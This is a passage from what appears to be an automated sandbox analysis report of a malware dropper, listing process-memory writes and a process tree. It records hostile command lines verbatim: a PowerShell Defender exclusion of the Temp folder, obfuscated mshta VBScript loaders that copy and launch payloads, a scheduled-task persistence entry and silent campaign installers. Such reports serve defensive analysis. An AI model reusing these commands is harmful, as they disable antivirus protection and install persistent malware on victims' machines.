Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3544 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3544 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3544 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 5000 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe
PID 5000 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe
PID 5000 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe
PID 4604 wrote to memory of 3796 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 3796 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 3796 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3612 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe
PID 3612 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe
PID 3612 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe
PID 4604 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4008 wrote to memory of 1144 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat191649b47c9e2.exe
PID 4008 wrote to memory of 1144 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat191649b47c9e2.exe
PID 3796 wrote to memory of 1324 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3796 wrote to memory of 1324 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3796 wrote to memory of 1324 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4792 wrote to memory of 1412 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19e4750dd01.exe
PID 4792 wrote to memory of 1412 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19e4750dd01.exe
PID 4792 wrote to memory of 1412 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19e4750dd01.exe
PID 768 wrote to memory of 3224 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19c6762a08beae.exe
PID 768 wrote to memory of 3224 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19c6762a08beae.exe
PID 768 wrote to memory of 3224 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19c6762a08beae.exe
PID 4148 wrote to memory of 1708 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19f84b58b3d7.exe
PID 4148 wrote to memory of 1708 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19f84b58b3d7.exe
PID 660 wrote to memory of 1712 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat1946eb84e6.exe
PID 660 wrote to memory of 1712 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat1946eb84e6.exe
PID 660 wrote to memory of 1712 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat1946eb84e6.exe
PID 884 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19e6a852f849bb2.exe
PID 884 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19e6a852f849bb2.exe
PID 884 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19e6a852f849bb2.exe
PID 2156 wrote to memory of 2348 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19ba05e89ea6d406.exe
PID 2156 wrote to memory of 2348 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19ba05e89ea6d406.exe
PID 2156 wrote to memory of 2348 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19ba05e89ea6d406.exe
PID 4276 wrote to memory of 4592 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat199ba8a4637dcb034.exe
PID 4276 wrote to memory of 4592 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat199ba8a4637dcb034.exe
PID 2348 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19ba05e89ea6d406.exe C:\Users\Admin\AppData\Local\Temp\is-0R9HU.tmp\Sat19ba05e89ea6d406.tmp

Processes

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe

"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Windows\System32\sihclient.exe

C:\Windows\System32\sihclient.exe /cv 1PsfHjy/6UuX87LF/E3WAg.0.2

C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat196ac06a9e6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat191649b47c9e2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1946eb84e6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat199ba8a4637dcb034.exe

C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe

Sat196ac06a9e6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19ba05e89ea6d406.exe

C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19e4750dd01.exe

Sat19e4750dd01.exe /mixone

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat191649b47c9e2.exe

Sat191649b47c9e2.exe

C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19c6762a08beae.exe

Sat19c6762a08beae.exe

C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19e6a852f849bb2.exe

Sat19e6a852f849bb2.exe

C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19ba05e89ea6d406.exe

Sat19ba05e89ea6d406.exe

C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat199ba8a4637dcb034.exe

Sat199ba8a4637dcb034.exe

C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat1946eb84e6.exe

Sat1946eb84e6.exe

C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19f84b58b3d7.exe

Sat19f84b58b3d7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19c6762a08beae.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19e6a852f849bb2.exe

C:\Users\Admin\AppData\Local\Temp\is-0R9HU.tmp\Sat19ba05e89ea6d406.tmp

"C:\Users\Admin\AppData\Local\Temp\is-0R9HU.tmp\Sat19ba05e89ea6d406.tmp" /SL5="$7003A,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19ba05e89ea6d406.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19f84b58b3d7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19e4750dd01.exe /mixone

C:\Users\Admin\AppData\Local\Temp\is-8TFS5.tmp\46807GHF____.exe

"C:\Users\Admin\AppData\Local\Temp\is-8TFS5.tmp\46807GHF____.exe" /S /UID=burnerch2

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1412 -ip 1412

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\ProgramData\4390821.exe

"C:\ProgramData\4390821.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 244

C:\ProgramData\8981631.exe

"C:\ProgramData\8981631.exe"

C:\ProgramData\6069887.exe

"C:\ProgramData\6069887.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe

"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3224 -ip 3224

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1272 -ip 1272

C:\ProgramData\149669.exe

"C:\ProgramData\149669.exe"

C:\Users\Admin\AppData\Local\Temp\udptest.exe

"C:\Users\Admin\AppData\Local\Temp\udptest.exe"

C:\ProgramData\3313646.exe

"C:\ProgramData\3313646.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3224 -s 292

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1272 -s 292

C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe

"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 532 -p 4220 -ip 4220

C:\ProgramData\6546358.exe

"C:\ProgramData\6546358.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 4112 -ip 4112

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\149669.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""== "" for %l In ( "C:\ProgramData\149669.exe") do taskkill -Im "%~nxl" /F

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe

"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"

C:\Users\Admin\AppData\Local\Temp\is-L7BH5.tmp\setup_2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-L7BH5.tmp\setup_2.tmp" /SL5="$2027A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 464

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 4376 -ip 4376

C:\ProgramData\4877252.exe

"C:\ProgramData\4877252.exe"

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5688 -ip 5688

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Users\Admin\AppData\Local\Temp\is-M578V.tmp\setup_2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-M578V.tmp\setup_2.tmp" /SL5="$20246,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"

C:\Users\Admin\AppData\Local\Temp\3002.exe

"C:\Users\Admin\AppData\Local\Temp\3002.exe"

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\ProgramData\6069887.exe

"C:\ProgramData\6069887.exe"

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\149669.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If """"== """" for %l In ( ""C:\ProgramData\149669.exe"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"

C:\Users\Admin\AppData\Local\Temp\3002.exe

"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a

C:\ProgramData\7798956.exe

"C:\ProgramData\7798956.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 5212 -ip 5212

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5212 -s 636

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\ProgramData\7798956.exe

"C:\ProgramData\7798956.exe"

C:\ProgramData\1510349.exe

"C:\ProgramData\1510349.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "149669.exe" /F

C:\ProgramData\8148614.exe

"C:\ProgramData\8148614.exe"

C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE

C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\1510349.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If """"== """" for %l In ( ""C:\ProgramData\1510349.exe"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "== "" for %l In ( "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 6016 -ip 6016

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\1510349.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""== "" for %l In ( "C:\ProgramData\1510349.exe") do taskkill -Im "%~nxl" /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6016 -s 1080

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 5428 -ip 5428

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5428 -s 312

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 476 -ip 476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 476 -s 460

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "1510349.exe" /F

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 652 -p 3388 -ip 3388

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3388 -s 2376

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 5360 -ip 5360

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 580 -p 5136 -ip 5136

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 5136 -s 2348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5360 -s 2420

C:\Program Files\Windows Photo Viewer\QKHSYTRWTS\ultramediaburner.exe

"C:\Program Files\Windows Photo Viewer\QKHSYTRWTS\ultramediaburner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\is-CFA31.tmp\ultramediaburner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-CFA31.tmp\ultramediaburner.tmp" /SL5="$40348,281924,62464,C:\Program Files\Windows Photo Viewer\QKHSYTRWTS\ultramediaburner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\97-85cbe-1b1-73991-1a0a48cb830cc\Jashedulaju.exe

"C:\Users\Admin\AppData\Local\Temp\97-85cbe-1b1-73991-1a0a48cb830cc\Jashedulaju.exe"

C:\Users\Admin\AppData\Local\Temp\70-37310-b33-bae8d-a4fad9cb4a45f\Bafumiluto.exe

"C:\Users\Admin\AppData\Local\Temp\70-37310-b33-bae8d-a4fad9cb4a45f\Bafumiluto.exe"

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe

"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5728 -ip 5728

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5728 -s 2440

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\atkyez3y.fgc\GcleanerEU.exe /eufive & exit

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8e3b846f8,0x7ff8e3b84708,0x7ff8e3b84718

C:\Users\Admin\AppData\Local\Temp\atkyez3y.fgc\GcleanerEU.exe

C:\Users\Admin\AppData\Local\Temp\atkyez3y.fgc\GcleanerEU.exe /eufive

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe /qn CAMPAIGN="654" & exit

C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe

C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe /qn CAMPAIGN="654"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hlti0apf.ahj\anyname.exe & exit

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

